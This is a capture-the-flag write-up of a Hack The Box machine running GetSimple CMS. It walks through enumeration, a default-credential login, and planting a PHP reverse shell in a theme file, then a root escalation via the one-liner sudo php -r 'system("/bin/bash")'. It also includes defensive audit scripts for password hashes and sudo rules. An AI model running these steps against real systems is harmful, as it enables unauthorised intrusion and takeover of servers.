HTB: GetSimple CMS

Easy HTB machine where I exploit a web server running GetSimple CMS.

I will use gobuster to find a hidden login page and use default credentials to get initial access. I get a www-data shell with a reverse shell, and elevate privileges to root using the passwordless sudo access to /usr/bin/php.

nmap output:

```text
DuxSec@hi$ nmap -sV -T4 -sC 10.129.217.0 -v
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-29 06:19 EDT
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
|   256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_  256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to GetSimple! - gettingstarted
| http-robots.txt: 1 disallowed entry
|_/admin/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 06:19
Completed NSE at 06:19, 0.00s elapsed
Initiating NSE at 06:19
Completed NSE at 06:19, 0.00s elapsed
Initiating NSE at 06:19
Completed NSE at 06:19, 0.01s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.82 seconds
```

Ports 22 and 80 are open. Let's have a look at the website, and while I am browsing I start a gobuster scan.

I tried to go to http://10.129.217.0 but this took ages to load, so I added the IP to my /etc/hosts file. I added the following line:

```text
10.129.217.0	gettingstarted.htb
```

After this change I could visit http://gettingstarted.htb without delay. I read in the HTB forums later on that multiple people had this issue.


Well, that took some time, and gobuster has already finished, so let's look at that.

```text
DuxSec@hi$ gobuster dir -u http://10.129.217.0 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.217.0
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/06/29 06:20:22 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/admin                (Status: 301) [Size: 312] [--> http://10.129.217.0/admin/]
/backups              (Status: 301) [Size: 314] [--> http://10.129.217.0/backups/]
/.htaccess            (Status: 403) [Size: 277]
/data                 (Status: 301) [Size: 311] [--> http://10.129.217.0/data/]
/index.php            (Status: 200) [Size: 5485]
/plugins              (Status: 301) [Size: 314] [--> http://10.129.217.0/plugins/]
/robots.txt           (Status: 200) [Size: 32]
/server-status        (Status: 403) [Size: 277]
/sitemap.xml          (Status: 200) [Size: 431]
/theme                (Status: 301) [Size: 312] [--> http://10.129.217.0/theme/]
Progress: 4444 / 4615 (96.29%)
===============================================================
2023/06/29 06:20:35 Finished
===============================================================
```

Many hits! /admin looks very interesting; it shows us the following login page:


I try the credentials admin:admin and I am in the admin panel!

I still checked the other gobuster hits to see if there was anything interesting, and found that several directories are listable, which might be helpful later on. Some examples:

http://gettingstarted.htb/data/other/authorization.xml

```xml
<item>
	<apikey>4f399dc72ff8e619e327800f851e9986</apikey>
</item>
```

http://gettingstarted.htb/data/users/admin.xml

```xml
<item>
	<USR>admin</USR>
	<NAME/>
	<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
	<EMAIL>admin@gettingstarted.com</EMAIL>
	<HTMLEDITOR>1</HTMLEDITOR>
	<TIMEZONE/>
	<LANG>en_US</LANG>
</item>
```
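The PWD value in that file is a bare SHA-1 digest, and it is exactly the SHA-1 of "admin", so the exposed data/users/ directory leaks the default login on its own. The following script is an added example of mine, not code from the writeup or from GetSimple: it parses a copy of admin.xml (embedded here as constructed sample input) and reports what a defender auditing the install should flag, namely the unsalted hash format and any match against a short list of default passwords (the list is an assumption, a starter set).

```python
import hashlib
import xml.etree.ElementTree as ET

# Constructed sample: a copy of the admin.xml served from the open data/users/ directory.
ADMIN_XML = """<item>
    <USR>admin</USR>
    <NAME/>
    <PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
    <EMAIL>admin@gettingstarted.com</EMAIL>
    <HTMLEDITOR>1</HTMLEDITOR>
    <TIMEZONE/>
    <LANG>en_US</LANG>
</item>"""

# Default passwords an install audit should reject outright (assumption: a starter list).
DEFAULT_PASSWORDS = ["admin", "password", "123456", "getsimple", "changeme"]


def parse_user(xml_text):
    """Return the username and stored password digest from a GetSimple user file."""
    root = ET.fromstring(xml_text)
    return {"user": root.findtext("USR", default=""),
            "pwd_hash": root.findtext("PWD", default="").strip().lower()}


def is_bare_sha1(digest):
    """A bare 40-hex-char value is a SHA-1 digest with no salt or cost parameters attached."""
    return len(digest) == 40 and all(c in "0123456789abcdef" for c in digest)


def find_default_password(pwd_hash, candidates=DEFAULT_PASSWORDS):
    """Return the default password whose SHA-1 equals pwd_hash, or None if none matches."""
    for candidate in candidates:
        if hashlib.sha1(candidate.encode()).hexdigest() == pwd_hash:
            return candidate
    return None


def audit_user_file(xml_text):
    """Findings a defender would report for one exposed user file."""
    user = parse_user(xml_text)
    findings = []
    if is_bare_sha1(user["pwd_hash"]):
        findings.append("password stored as unsalted SHA-1; a leaked file is trivially guessable")
    match = find_default_password(user["pwd_hash"])
    if match is not None:
        findings.append("account '%s' still uses the default password '%s'" % (user["user"], match))
    return findings
```

Running `audit_user_file(ADMIN_XML)` on the sample returns both findings; the fix is to change the default password and deny web access to data/ (robots.txt only hides /admin/, it does not protect anything).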


The next step is to get a reverse shell. I chose to use https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php due to its simplicity, and replace the original theme code with the reverse shell.

Now I can open a nc listener and browse to http://gettingstarted.htb. Normally the site would load the theme file, but since that is my reverse shell now, it executes that instead. It connects back to me and I successfully get a shell as www-data.

```text
DuxSec@hi$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.15.155] from (UNKNOWN) [10.129.162.83] 52066
Linux gettingstarted 5.4.0-65-generic #73-Ubuntu SMP Mon Jan 18 17:25:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 14:28:43 up 30 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
```

To get a fully interactive shell I use Python3:

```text
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@gettingstarted:/$ ^Z
zsh: suspended  nc -lvnp 4444
DuxSec@hi$ stty raw -echo; fg
[1]  + continued  nc -lvnp 4444
www-data@gettingstarted:/$
```

The first flag can be read since www-data has read access to mrb3n’s home directory.

```text
www-data@gettingstarted:/home/mrb3n$ cat user.txt
7002d65b149b0a4d19132a66feed21d8
```

To get the root flag I look at the sudo rights, and `sudo -l` shows that www-data can run /usr/bin/php as root without a password.

```text
www-data@gettingstarted:/$ sudo -l
Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
```

Knowing that PHP can be run via sudo, I can spawn a root shell from PHP in the following way:

```text
www-data@gettingstarted:/$ sudo /usr/bin/php -r 'system("/bin/bash");'
root@gettingstarted:/# whoami
root
root@gettingstarted:/# cd /root
root@gettingstarted:~# cat root.txt
root@gettingstarted:~# f1fba6e9f71efb2630e6e34da6387842
```

If I didn't know PHP, I could use https://gtfobins.github.io/gtfobins/php/ to find a privilege escalation one-liner.
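The sudo rule is the whole privilege escalation: a NOPASSWD entry for an interpreter is equivalent to NOPASSWD: ALL, because the interpreter will happily run system("/bin/bash"). The following audit script is an added example of mine, not from the writeup or any tool it mentions: it parses `sudo -l` output (embedded here as a constructed copy of the output shown above) and flags rules that grant a shell-capable binary as root without a password. The SHELL_CAPABLE set is an assumption, a starter list rather than the full GTFOBins sudo category.

```python
import re

# Constructed sample: the `sudo -l` output from the box, reflowed into lines.
SUDO_L_OUTPUT = r"""Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
"""

# Binaries that run arbitrary code or spawn a shell when executed as root.
# Assumption: a starter set, not a complete one; GTFOBins' sudo category lists many more.
SHELL_CAPABLE = {"php", "python", "python3", "perl", "ruby", "node", "bash", "sh",
                 "vi", "vim", "find", "awk", "env", "less", "more"}

# One sudoers rule as `sudo -l` prints it: "(runas) TAG: cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_rules(output):
    """Return (runas, nopasswd, command) triples from the 'may run' section of `sudo -l`."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # everything after this header is a rule line
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def risky_rules(output):
    """Rules that hand the user a shell-capable binary as root without a password."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_rules(output):
        as_root = runas.split(":")[0].strip() in ("ALL", "root")
        binary = cmd.split()[0].rsplit("/", 1)[-1]      # '/usr/bin/php' -> 'php'
        if as_root and nopasswd and (cmd == "ALL" or binary in SHELL_CAPABLE):
            findings.append("%s as root with NOPASSWD: equivalent to an unrestricted root shell" % cmd)
    return findings
```

On the sample, `risky_rules(SUDO_L_OUTPUT)` returns one finding for /usr/bin/php; the same check run over every account's `sudo -l` (or over /etc/sudoers and sudoers.d) is a cheap way to catch this class of misconfiguration before a web shell does.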